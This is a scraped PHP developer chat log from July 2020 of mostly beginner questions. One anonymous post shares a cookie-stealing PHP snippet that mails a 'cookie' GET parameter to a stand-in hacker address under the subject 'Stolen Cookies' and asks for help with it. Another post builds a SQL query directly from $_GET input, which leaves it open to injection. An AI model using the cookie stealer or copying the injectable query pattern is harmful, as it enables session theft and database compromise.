Can someone tell me whether latin1 encoding can be used as a preventive measure against sqli?

|
digitechunited 2020-07-25 10:26:21
I want to scrape links from an Android app. It is an ebook app with google drive links for each book. There are 25 categories with approx 100 books in each. Later I will copy those links to the database of my php website. I tried to intercept the traffic using BurpSuite but there wasn’t anything useful. Also tried to search some scripts related to it on GitHub. Can someone suggest me any other idea to achieve this?
2020-07-26 07:13:08
Hi all
2020-07-26 07:13:23
How to play all video file format files in web page
2020-07-26 07:13:59
Only mp4 , webm and ogg are working
vostfreecom 2020-07-26 09:49:16
Wakanim download episode please
Kaushal_comp 2020-07-26 10:23:39
any person give to wrk in php like fresher so Ping me
Kaushal_comp 2020-07-26 10:26:11
One of my friend wants a wrk in php nd he is fresher
Anshuit 2020-07-26 12:51:54
Kaushal_comp 2020-07-26 10:26:11
One of my friend wants a wrk in php nd he is fresher

he can work on third party integration in php.

Arpit Jain 2020-07-26 13:06:24
Any ready made Lms available with zoom integration ?
Ramesh Khandelwal 2020-07-26 15:30:19
I am 2 years experienced php developer
vostfreecom 2020-07-26 18:03:17
Ramesh Khandelwal 2020-07-26 15:30:19
I am 2 years experienced php developer

Datalife engine module video. any help

Ramesh Khandelwal 2020-07-26 18:50:20
Actually this is my father number

Myself Eti khandelwal, I am php developer

Ramesh Khandelwal 2020-07-26 18:51:07
vostfreecom 2020-07-26 18:03:17
Datalife engine module video. any help

Right now i don’t have any idea but I will try to learn this

akshaykumar51 2020-07-26 18:57:21
I want to use comment and reply system in my website.
I have created comment system using for loop.
Now i need to add reply system for that i need to execute for loop inside for loop.
But php inside php not running
akshaykumar51 2020-07-26 18:57:37
Any idea how can i add reply system
Shubbb 2020-07-26 19:04:08
akshaykumar51 2020-07-26 18:57:21
I want to use comment and reply system in my website.
I have created comment system using for loop.
Now i need to add reply system for that i need to execute for loop inside for loop.
But php inside php not running

Show code

akshaykumar51 2020-07-26 19:06:57
Code is very long
akshaykumar51 2020-07-26 19:07:26
I simply used for loop inside php pdo
akshaykumar51 2020-07-26 19:07:38
To fetch comments
Shubbb 2020-07-26 19:31:50
akshaykumar51 2020-07-26 19:06:57
Code is very long

How anyone could conclude anything without seeing code bro

Shubbb 2020-07-26 19:32:01
Take snapshot or something
m m 2020-07-27 12:37:34
I am fresher in php I work classified ads how dynicaly change icon for categories like car category show car icon it’s dynamically change
akshaykumar51 2020-07-27 13:44:14
Shubbb 2020-07-26 19:32:01
Take snapshot or something

Umable to send image in this group

2020-07-27 13:51:24
new to php want to be developer
2020-07-27 13:51:35
please guide me
RamRox 2020-07-27 14:42:25
Anyone have ePaper System Code
Unstable32 2020-07-27 18:08:57
Can someone tell me whether latin1 encoding can be used as a preventive measure against sqli?
Jaswanth_Raj 2020-07-27 20:23:03
joeopoflic 2020-07-25 09:39:55
I have a shared hosting which mp4 files are not allowed..
I have a movie app so I want to host my files there

Use file host website and upload the required file store the address in php

Prashant Patil 2020-07-27 21:19:09
Php n Mysql
My MySQL insert query failed when I entered/type ‘ in my textarea field while entering data….
akshaykumar51 2020-07-27 21:32:59
How can i rename table name in php
D_deepak 2020-07-28 06:29:57
I am making telegram bot
But i need some help
theman_behind 2020-07-28 06:36:14
akshaykumar51 2020-07-27 21:32:59
How can i rename table name in php

table_name AS new_name

akshaykumar51 2020-07-28 07:39:37
theman_behind 2020-07-28 06:36:14
table_name AS new_name

Not working

Avni Patel 2020-07-28 08:07:02
Alter table old_table_name RENAME TO new_table_name
akshaykumar51 2020-07-28 08:07:23
Not working
Avni Patel 2020-07-28 08:08:15
RENAME TABLE old_table TO new_table
akshaykumar51 2020-07-28 08:08:31
Not working
Avni Patel 2020-07-28 08:08:56
Which sql you’re using?
akshaykumar51 2020-07-28 08:09:40
Sqli + prepared statement
kameshindore 2020-07-28 08:20:27
Avni Patel 2020-07-28 08:08:15
RENAME TABLE old_table TO new_table

this should be working in case of mysql database.

2020-07-28 08:40:33
<?php
$cookie = $HTTP_GET_VARS[“cookie”]; mail(“hackerid@mailprovider”, “Stolen Cookies”, $cookie);
?>
2020-07-28 08:40:43
2020-07-28 08:40:33
<?php
$cookie = $HTTP_GET_VARS[“cookie”]; mail(“hackerid@mailprovider”, “Stolen Cookies”, $cookie);
?>

Can anyone help me

akshaykumar51 2020-07-28 08:41:27
kameshindore 2020-07-28 08:20:27
this should be working in case of mysql database.

Am using maria db version 10+

Prashant Patil 2020-07-28 09:39:17
Php n Mysql
My MySQL insert query failed when I entered/type ‘ in my textarea field while entering data….any idea
cgmafia 2020-07-28 14:46:54
Hi, can somebody suggest me ang free multivendor extension for Magento 2 or any tutorials
Beyjaaa 2020-07-28 17:18:59
Anyone have a source code for store management?
Beyjaaa 2020-07-28 17:19:10
Emm
Rishab1136 2020-07-28 18:22:40
sir below my code for search data from the database and show in view page,but if i run this query then error shows,this is my code <?php
if(isset($_GET[‘searchbutton’])){
$search=$_GET[‘search’];
$sql=”SELECT * FROM emp_record WHERE ename=$search OR ssn = $search”;
$rs= mysqli_query($conn, $sql);
?>
<table>
<caption>Search result</caption>
<tr>
<th>ID</th>
<th>NAME</th>
<th>SSN</th>
<th>DEPARTMENT</th>
<th>SALARY</th>
<th>HOME ADDRESS</th>
<th>Search Again</th>
</tr>

<?php

while($row= mysqli_fetch_array($rs)){
$id = $row[‘id’];
$ename = $row[‘ename’];
$ssn = $row[‘ssn’];
$dept = $row[‘dept’];
$salary=$row[‘salary’];
$homeaddress = $row[‘homeaddress’];

?>

<tr>
<th><?php echo $id;?></th>
<th><?php echo $ename;?></th>
<th><?php echo $ssn;?></th>
<th><?php echo $dept;?></th>
<th><?php echo $salary;?></th>
<th><?php echo $homeaddress;?></th>
<th><a href=”view_data.php”></a>Search Again</th>
</tr>
</table>

Rishab1136 2020-07-28 18:24:07
Warning: mysqli_fetch_array() expects parameter 1 to be mysqli_result, bool given in C:xampphtdocsbasicemp_crudview_data.php sir this warning is coming when i run this code ………….please tell whats wrong
2020-07-28 18:37:39
Please check the contents of rs array
|